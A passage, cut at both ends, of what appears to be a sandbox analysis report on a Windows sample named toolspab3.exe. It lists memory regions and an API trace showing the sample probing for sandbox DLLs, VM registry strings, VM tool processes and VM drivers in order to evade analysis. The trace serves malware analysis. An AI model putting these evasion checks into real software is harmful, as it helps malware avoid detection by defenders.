0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 356 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 357 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 358 start_va = 0x880000 end_va = 0xa00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 359 start_va = 0xa10000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 360 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 361 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 362 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 363 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 364 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 365 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 366 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 367 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 368 start_va = 0x1e10000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 369 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 370 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 371 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 372 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 373 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 374 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 375 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 376 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 377 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 378 start_va = 0x1e10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 379 start_va = 0x1f70000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 380 start_va = 0x1f80000 end_va = 0x20fafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 381 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 382 start_va = 0x420000 end_va = 0x425fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 383 start_va = 0x430000 end_va = 0x434fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 802 start_va = 0x520000 end_va = 0x535fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Thread: id = 3 os_tid = 0x1310 [0090.019] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="kernel32" | out: DestinationString="kernel32") [0090.019] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74530000) returned 0x0 [0090.019] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="user32" | out: DestinationString="user32") [0090.019] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76300000) returned 0x0 [0090.110] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="advapi32" | out: DestinationString="advapi32") [0090.110] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76a90000) returned 0x0 [0090.968] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="shell32" | out: DestinationString="shell32") [0090.968] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74a90000) returned 0x0 [0099.277] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0099.278] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x450598 [0099.278] GetKeyboardLayoutList (in: nBuff=1, lpList=0x450598 | out: lpList=0x450598) returned 1 [0099.279] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb0c | out: TokenHandle=0x19fb0c*=0x150) returned 1 [0099.279] GetTokenInformation (in: TokenHandle=0x150, TokenInformationClass=0x19, TokenInformation=0x19fb10, TokenInformationLength=0x14, ReturnLength=0x19fb08 | out: TokenInformation=0x19fb10, ReturnLength=0x19fb08) returned 1 [0099.279] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x19fd4c, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0099.279] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0099.280] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x158 [0099.280] MapViewOfFile (hFileMappingObject=0x158, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1f80000 [0099.282] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd50, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\toolspab3.exe")) returned 0x2b [0099.283] wcsstr (_Str="C:\\Users\\RDhJ0CNFevzX\\Desktop\\toolspab3.exe", _SubStr="7869.vmt") returned 0x0 [0099.283] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x19ff4c, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x19ff4c, ResultLength=0x0) returned 0x0 [0099.283] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19ff54, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ff54, ReturnLength=0x0) returned 0x0 [0099.283] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0099.283] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0099.284] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0099.284] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x458190 [0099.284] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0099.284] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0099.284] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x0) returned 0xc0000034 [0099.284] LocalFree (hMem=0x458190) returned 0x0 [0099.284] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x458190 [0099.284] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0099.284] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0099.284] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x15c) returned 0x0 [0099.284] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0099.284] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x459ef0 [0099.284] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x459ef0, Length=0x2c, ResultLength=0x19ff48 | out: KeyInformation=0x459ef0, ResultLength=0x19ff48) returned 0x0 [0099.284] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0099.285] LocalAlloc (uFlags=0x40, uBytes=0x4e) returned 0x45a940 [0099.285] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x45a940, Length=0x4e, ResultLength=0x19ff48 | out: KeyInformation=0x45a940, ResultLength=0x19ff48) returned 0x0 [0099.285] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="qemu") returned 0x0 [0099.285] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="virtio") returned 0x0 [0099.285] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vmware") returned 0x0 [0099.285] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vbox") returned 0x0 [0099.286] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="xen") returned 0x0 [0099.286] LocalFree (hMem=0x45a940) returned 0x0 [0099.286] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0099.286] LocalAlloc (uFlags=0x40, uBytes=0x44) returned 0x45a940 [0099.286] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x45a940, Length=0x44, ResultLength=0x19ff48 | out: KeyInformation=0x45a940, ResultLength=0x19ff48) returned 0x0 [0099.286] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="qemu") returned 0x0 [0099.286] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="virtio") returned 0x0 [0099.286] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vmware") returned 0x0 [0099.286] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vbox") returned 0x0 [0099.286] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="xen") returned 0x0 [0099.286] LocalFree (hMem=0x45a940) returned 0x0 [0099.286] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0099.287] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x45a940 [0099.287] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x45a940, Length=0x50, ResultLength=0x19ff48 | out: KeyInformation=0x45a940, ResultLength=0x19ff48) returned 0x0 [0099.287] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="qemu") returned 0x0 [0099.287] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="virtio") returned 0x0 [0099.287] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vmware") returned 0x0 [0099.287] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vbox") returned 0x0 [0099.287] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="xen") returned 0x0 [0099.287] LocalFree (hMem=0x45a940) returned 0x0 [0099.287] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0099.288] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x45a940 [0099.288] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x45a940, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x45a940, ResultLength=0x19ff48) returned 0x0 [0099.288] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="qemu") returned 0x0 [0099.288] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="virtio") returned 0x0 [0099.288] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vmware") returned 0x0 [0099.288] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vbox") returned 0x0 [0099.288] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="xen") returned 0x0 [0099.288] LocalFree (hMem=0x45a940) returned 0x0 [0099.288] LocalFree (hMem=0x459ef0) returned 0x0 [0099.288] NtClose (Handle=0x15c) returned 0x0 [0099.289] LocalFree (hMem=0x458190) returned 0x0 [0099.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x1dd00) returned 0xc0000004 [0099.295] LocalAlloc (uFlags=0x40, uBytes=0x1ed00) returned 0x1e12050 [0099.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e12050, Length=0x1ed00, ResultLength=0x19ff54 | out: SystemInformation=0x1e12050, ResultLength=0x19ff54*=0x17280) returned 0x0 [0099.307] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0099.307] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0099.307] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0099.307] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0099.307] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0099.307] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0099.307] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0099.307] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.307] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0099.307] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0099.307] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.307] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.307] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.307] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.307] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.307] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0099.307] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.308] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.308] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0099.308] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0099.308] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.308] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.308] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.308] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.308] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.309] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.309] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0099.309] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0099.309] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.309] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.309] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.309] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.309] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.309] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0099.309] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0099.309] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.309] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.309] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.309] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.309] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.309] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0099.309] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0099.309] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.309] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.309] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.309] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.310] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.310] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.310] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0099.310] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0099.310] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.310] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.311] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.311] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.311] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.312] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0099.312] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0099.312] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0099.312] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0099.312] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0099.312] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0099.312] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0099.312] LocalFree (hMem=0x1e12050) returned 0x0 [0099.312] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x9800) returned 0xc0000004 [0099.312] LocalAlloc (uFlags=0x40, uBytes=0xa800) returned 0x1e12050 [0099.312] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x1e12050, Length=0xa800, ResultLength=0x19ff54 | out: SystemInformation=0x1e12050, ResultLength=0x19ff54*=0x9800) returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0099.313] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0099.313] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0099.313] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0099.313] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0099.313] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0099.313] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0099.314] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0099.314] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0099.314] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0099.314] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0099.314] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0099.314] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0099.314] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vmci.s") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vmusbm") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vmmous") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vm3dmp") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vmrawd") returned 0x0 [0099.314] strstr (_Str="kd.dll", _SubStr="vmmemc") returned 0x0 [0099.314] strstr (_Str="kd.dll", 